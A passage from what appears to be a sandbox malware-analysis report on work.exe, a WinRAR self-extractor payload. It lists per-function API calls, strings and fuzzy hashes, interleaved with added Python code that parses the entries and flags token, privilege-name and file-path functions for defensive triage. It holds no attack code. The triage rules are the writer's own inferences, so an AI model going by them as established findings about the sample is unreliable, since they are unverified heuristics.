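                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    subcall_of: Optional[str] = None  # callee address when listed as "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    similarity: dict = field(default_factory=dict)
    uniqueness_score: Optional[float] = None

def parse_records(text):
    """Split report text into FunctionRecords; a record starts at each 'APIs' heading."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif rec is None:
            continue  # text before the first record
        elif (m := SCORE_RE.match(line)):
            rec.uniqueness_score = float(m["score"])
        elif section == "APIs" and (m := API_RE.match(line)):
            rec.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
        elif section == "Memory Dump Source" and (m := KV_RE.match(line)) and m["key"] == "Source File":
            rec.source_file = m["val"].split(",")[0]  # drop ", Offset: ..., based on PE: ..."
        elif section == "Similarity" and (m := KV_RE.match(line)):
            rec.similarity[m["key"]] = m["val"]
    return records

def pivot_key(rec):
    # API String ID's two halves follow the API ID and String ID (second half is 0 with no strings).
    return rec.similarity.get("API String ID", ""), rec.similarity.get("Opcode Fuzzy Hash", "")

# Editor's heuristic, not a report field: calls that on their own are MSVC CRT startup/teardown.
CRT_HOUSEKEEPING = {"GetEnvironmentStringsW", "FreeEnvironmentStringsW", "WideCharToMultiByte",
                    "RtlAllocateHeap", "RtlFreeHeap", "GetLastError", "SetLastError"}

def is_crt_noise(rec):
    # The CRT's exit() asks mscoree.dll for CorExitProcess so a CLR-hosted process shuts down cleanly.
    if rec.similarity.get("String ID") == "CorExitProcess$mscoree.dll":
        return True
    return bool(rec.apis) and all(a.module == "LIBCMT" or a.name in CRT_HOUSEKEEPING for a in rec.apis)

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(pivot_key(rec), "crt-noise" if is_crt_noise(rec) else "review", [a.name for a in rec.apis])
```

Run on the sample, both records come back as runtime noise: the mscoree.dll/CorExitProcess lookup is how the MSVC CRT's exit() hands shutdown to a hosting CLR, and the environment-block conversion is CRT startup, so both describe the compiler runtime rather than behaviour specific to this sample. The records that survive the filter are the ones worth reading, and their API String ID and Opcode Fuzzy Hash are what to search other reports for.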

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,0033A7F0,0033C348,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033A59E
                                                                                              • _free.LIBCMT ref: 0033A5D3
                                                                                              • _free.LIBCMT ref: 0033A5FA
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A607
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 0c166b2af34674386aaed56ca48a1691efe27bf2ba972a3d346e6c8528ca64c2
                                                                                              • Instruction ID: bd7dd18d416832cae47fc7eba96af7cbd67f4fefd6a158a2e1106bb325dce976
                                                                                              • Opcode Fuzzy Hash: 0c166b2af34674386aaed56ca48a1691efe27bf2ba972a3d346e6c8528ca64c2
                                                                                              • Instruction Fuzzy Hash: F901493A244E0067931767246CC7E1B326EDBC2371F260024F9C5A6162EF248C015266
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 003224EF: ResetEvent.KERNEL32(?), ref: 00322501
                                                                                                • Part of subcall function 003224EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00322515
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00322241
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 0032225B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00322274
                                                                                              • CloseHandle.KERNEL32(?), ref: 00322280
                                                                                              • CloseHandle.KERNEL32(?), ref: 0032228C
                                                                                                • Part of subcall function 00322303: WaitForSingleObject.KERNEL32(?,000000FF,00322526,?), ref: 00322309
                                                                                                • Part of subcall function 00322303: GetLastError.KERNEL32(?), ref: 00322315
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: 9fe7f667389cc1264a3d18e78e48c728f87d38c3704ef45b9a5c53f37287d9fc
                                                                                              • Instruction ID: 329a6fad3383764cb12e0a07e6c9817745e1d279f99979639e464b6e6f353878
                                                                                              • Opcode Fuzzy Hash: 9fe7f667389cc1264a3d18e78e48c728f87d38c3704ef45b9a5c53f37287d9fc
                                                                                              • Instruction Fuzzy Hash: 31015E76000B04EFC7339B64ED85BC6FBADFB09710F014939F26A56160CB767A65CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0033D9D7
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033D9E9
                                                                                              • _free.LIBCMT ref: 0033D9FB
                                                                                              • _free.LIBCMT ref: 0033DA0D
                                                                                              • _free.LIBCMT ref: 0033DA1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 5d4d34081239ef1bd355fda14b3e261e3ed93220fcf3e42f618d84fec72a1296
                                                                                              • Instruction ID: 4bfaacc0d04c7d0f6d134b7c4eb5d773bfba8829b3b417098ea2dbf9608deb9d
                                                                                              • Opcode Fuzzy Hash: 5d4d34081239ef1bd355fda14b3e261e3ed93220fcf3e42f618d84fec72a1296
                                                                                              • Instruction Fuzzy Hash: A2F01272614B00EB8627DB64F9C7D1673EDBB04711F6A0C09F488EB561CB71FC808654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 00323340
• _wcslen.LIBCMT ref: 00323351
• _wcslen.LIBCMT ref: 00323361
• _wcslen.LIBCMT ref: 0032336F
• CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0031C844,?,?,00000000,?,?,?), ref: 0032338A
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen$CompareString
• String ID:
• API String ID: 3397213944-0
• Opcode ID: ea32f826a2f6b075ed259b0770ba0e11a2159f78d2b589b7db37761eed67a6f0
• Instruction ID: bbccb9803166db102fd72d9b6ce97051cb5bae018fd520abff00496495cfcdf9
• Opcode Fuzzy Hash: ea32f826a2f6b075ed259b0770ba0e11a2159f78d2b589b7db37761eed67a6f0
• Instruction Fuzzy Hash: 06F01736008124BBCF136F61EC49DCE7F26EF95B60F258015FA296E061CE32A6659B90
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00339CEE
  • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
  • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
• _free.LIBCMT ref: 00339D00
• _free.LIBCMT ref: 00339D13
• _free.LIBCMT ref: 00339D24
• _free.LIBCMT ref: 00339D35
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ff8d01a0649f876dab881ea684c7d56c5d1be071942b2e18f41b36be5d211ef8
• Instruction ID: 72c8edff994713e93b29dca1b69151d2cefa5233e02c3faf4dc2a5cdf64bc584
• Opcode Fuzzy Hash: ff8d01a0649f876dab881ea684c7d56c5d1be071942b2e18f41b36be5d211ef8
• Instruction Fuzzy Hash: CAF0F474501A50DBC62B6F14FC8380437B9F725722F150A0AF49D5A275DB725991CF85
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
• Opcode ID: 7140af4e4e7cb43f98c64bc8cf11eeb9422ce3345f9ab45cabdd76e8dac121e7
• Instruction ID: 01612befd9f60eca7b45bd8f74c9bda3ea814e86ecf098b08c6fb59f9661f684
• Opcode Fuzzy Hash: 7140af4e4e7cb43f98c64bc8cf11eeb9422ce3345f9ab45cabdd76e8dac121e7
• Instruction Fuzzy Hash: 2E51EC31688320FEEA275A94BC02F7B765DAF18B01F204506F7876CCE5CBA155A06717
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe,00000104), ref: 00339370
• _free.LIBCMT ref: 0033943B
• _free.LIBCMT ref: 00339445
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
• API String ID: 2506810119-1799323542
• Opcode ID: ad316f37401f6e552797677ebb94142d3326cdb23e60a47f6dca567a0e92533f
• Instruction ID: 96b5613331481e19a9d131de26beb44ce76ee9dece111fcf720a8684d8ca3d15
• Opcode Fuzzy Hash: ad316f37401f6e552797677ebb94142d3326cdb23e60a47f6dca567a0e92533f
• Instruction Fuzzy Hash: 4D3183B1A04258EBDB23DB9A9CC1E9EBBFCEB85710F114067F5089B251D7B09A418B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0033438B
• _abort.LIBCMT ref: 00334496
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: EncodePointer_abort
• String ID: MOC$RCC
• API String ID: 948111806-2084237596
• Opcode ID: bf1c1a6235b8461d0b86ad94f6a091a6676631ad2bf73b9dd583fb03bf957340
• Instruction ID: 8619645d01c3986fea33a65e55138c75a48dc6e746b00c100dd30a3656b5d7ac
• Opcode Fuzzy Hash: bf1c1a6235b8461d0b86ad94f6a091a6676631ad2bf73b9dd583fb03bf957340
• Instruction Fuzzy Hash: 0C417A71900209AFCF16DF98DD81AEEBBB5FF08314F158069FA146B221D335E961DB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00317F20
  • Part of subcall function 003142F1: __EH_prolog.LIBCMT ref: 003142F6
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00317FE5
  • Part of subcall function 00318704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
  • Part of subcall function 00318704: OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
  • Part of subcall function 00318704: GetLastError.KERNEL32 ref: 00318759
  • Part of subcall function 00318704: CloseHandle.KERNEL32(?), ref: 00318768
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ErrorH_prologLastProcess$CloseCurrentHandleOpenToken
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 2595646239-639343689
• Opcode ID: d7dd84048d9241dcfad7a38007f59684a76a0ce777f67e70a5ba986769ffd07e
• Instruction ID: 8df3a883fb1094ae466579833e077fe88effdc0e03cebba6f313901e430929cd
• Opcode Fuzzy Hash: d7dd84048d9241dcfad7a38007f59684a76a0ce777f67e70a5ba986769ffd07e
• Instruction Fuzzy Hash: FC31C031940348BEDF2BEB649C41BEEBBBDAB0C354F040025F405AB191DB748A85CBA1
Uniqueness
Uniqueness Score: -1.00%
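The entries in this listing are per-function summaries that the Joe Sandbox IDA plugin produced from the work.exe memory dump: each one lists the Windows and CRT calls the function makes (calls made inside a callee are marked "Part of subcall function" with the callee's address), the strings it references, and a per-function Instruction Fuzzy Hash that the Similarity section is keyed on. What follows is an added example, not Joe Sandbox code and not part of the analysed sample, that parses entries in this layout and triages them; it is fed the two entries above that matter most here, the function referencing SeRestorePrivilege and SeSecurityPrivilege around an OpenProcessToken subcall, and the function that reads its own path under the RarSFX0 temp directory a WinRAR self-extractor unpacks into. The parsing rules are inferred from the layout on this page, the input is copied (abridged) from those two entries, and the flag names and the TOKEN_APIS list are this example's own.

```python
"""Parse the function-level entries above (APIs / Strings / Memory Dump Source /
Similarity / Uniqueness blocks) into records and triage them.  Added example, not
Joe Sandbox code and not part of the sample: the layout rules are inferred from the
entries on this page, and the flag names in triage() are this example's own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: two entries copied (abridged) from the report text above.
SAMPLE = r"""
APIs
• __EH_prolog.LIBCMT ref: 00317F20
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00317FE5
  • Part of subcall function 00318704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
  • Part of subcall function 00318704: OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
  • Part of subcall function 00318704: CloseHandle.KERNEL32(?), ref: 00318768
Strings
Similarity
• API ID: ErrorH_prologLastProcess$CloseCurrentHandleOpenToken
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 2595646239-639343689
• Instruction Fuzzy Hash: FC31C031940348BEDF2BEB649C41BEEBBBDAB0C354F040025F405AB191DB748A85CBA1
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe,00000104), ref: 00339370
• _free.LIBCMT ref: 0033943B
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
• API String ID: 2506810119-1799323542
• Instruction Fuzzy Hash: 4D3183B1A04258EBDB23DB9A9CC1E9EBBFCEB85710F114067F5089B251D7B09A418B91
Uniqueness
Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# Optional "Part of subcall function X:" prefix, then API.MODULE(...), then the call site.
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+).*?ref: (?P<ref>[0-9A-F]+)$")

@dataclass
class Call:
    api: str
    module: str
    ref: str                 # call-site address inside the dumped module
    caller: str | None       # set when the report lists it under a subcall function

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)   # raw "key: value" items
    uniqueness: str | None = None

    @property
    def fuzzy_hash(self) -> str | None:
        return self.similarity.get("Instruction Fuzzy Hash")

    def string_ids(self) -> list:
        # The report joins several strings with "$"; an empty "String ID:" yields [].
        return [s for s in self.similarity.get("String ID", "").split("$") if s]

def parse_entries(text: str) -> list:
    """Split on 'Uniqueness Score' lines (assumption: every entry ends with one)."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur, section = FunctionEntry(), None
        elif line in SECTIONS:
            section = line
        elif line.startswith("•"):
            item = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(item)):
                cur.calls.append(Call(m["api"], m["module"], m["ref"], m["caller"]))
            elif section == "Similarity":
                key, _, value = item.partition(":")
                cur.similarity[key.strip()] = value.strip()
    return entries

PRIV_RE = re.compile(r"^Se\w+Privilege$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")
TOKEN_APIS = {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueA", "LookupPrivilegeValueW"}

def triage(entry: FunctionEntry) -> set:
    """Flag functions worth a closer look; subcall APIs count because the report lists them."""
    flags = set()
    if any(PRIV_RE.match(s) for s in entry.string_ids()):
        flags.add("privilege-name")
    if any(c.api in TOKEN_APIS for c in entry.calls):
        flags.add("token-api")
    if any(PATH_RE.match(s) for s in entry.string_ids()):
        flags.add("file-path")
    return flags
```

Run it over the full function listing of a report rather than the two embedded entries; the fuzzy_hash property is the value to carry into a lookup against other reports, since CRT and SFX-stub functions recur across samples built with the same toolchain, and the flags separate the handful of functions that touch tokens, privilege names or on-disk paths from the bulk of library code.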

APIs
  • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
  • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
• EndDialog.USER32(?,00000001), ref: 0032BE68
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0032BE7D
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0032BE92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
• Opcode ID: 37b7824eb5d8864163958e7be006664c5fdcf13bc36ecf3cfafa0a803331499f
• Instruction ID: c9d9bd2b253f23052dbf1b96d06a40122f77a8409dcbae11331e3a0ea266e7a5
• Opcode Fuzzy Hash: 37b7824eb5d8864163958e7be006664c5fdcf13bc36ecf3cfafa0a803331499f
• Instruction Fuzzy Hash: 1F11E633600522BFE6239F68FC06FFAB7ADEB4A740F020414F744AB0B4C76299459766
Uniqueness
Uniqueness Score: -1.00%

APIs
• __fprintf_l.LIBCMT ref: 0031EC74
• _strncpy.LIBCMT ref: 0031ECBA
  • Part of subcall function 003230F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00353070,00000200,0031EC48,00000000,?,00000050,00353070), ref: 00323112
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443
• Opcode ID: 5847c0c721275f8ae8f543280d8d6afedab34362d99bf308bbcfa4a9fa01dcec
• Instruction ID: 842774401fb78232d619d62f9f2c8fcbcadf2441a10c74f26422a5bfd7054cce
• Opcode Fuzzy Hash: 5847c0c721275f8ae8f543280d8d6afedab34362d99bf308bbcfa4a9fa01dcec
• Instruction Fuzzy Hash: 6921A57284031CAEEB26DFA4CD41FDF3BE8AF09700F140522FD119A191E772E6848B91
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221A5
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221AF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221BF
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 003221D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 7ce859d655af0c3ae106b720f0cac53375090eda2b22e2334d92959db2a6c8ec
                                                                                              • Instruction ID: 9b7e1e802694092b9ff75b775d6f63a2e97ddb8fa866023cac94d0d1aa23d3ab
                                                                                              • Opcode Fuzzy Hash: 7ce859d655af0c3ae106b720f0cac53375090eda2b22e2334d92959db2a6c8ec
